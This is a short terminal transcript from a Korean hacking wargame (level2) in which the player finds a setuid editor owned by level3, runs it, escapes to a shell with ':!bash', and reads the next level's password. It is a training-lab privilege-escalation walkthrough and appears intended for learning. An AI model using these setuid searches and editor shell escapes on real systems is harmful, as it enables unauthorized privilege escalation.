login as: level2
level2@192.168.35.100's password:
[level2@ftz level2]$ cat hint


텍스트 파일 편집 중 쉘의 명령을 실행시킬 수 있다는데...


[level2@ftz level2]$ find / -user level3 -perm -4000 2>/dev/null
/usr/bin/editor
[level2@ftz level2]$ /usr/bin/editor

~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~                                          VIM - Vi IMproved
~
~                                           version 6.1.320
~                                      by Bram Moolenaar et al.
~                             Vim is open source and freely distributable
~
~                                    Help poor children in Uganda!
~                           type  :help iccf<Enter>       for information
~
~                           type  :q<Enter>               to exit
~                           type  :help<Enter>  or  <F1>  for on-line help
~                           type  :help version6<Enter>   for version info
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
:!bash

[level3@ftz level2]$ my-pass

Level3 Password is "can you fly?".

[level3@ftz level2]$

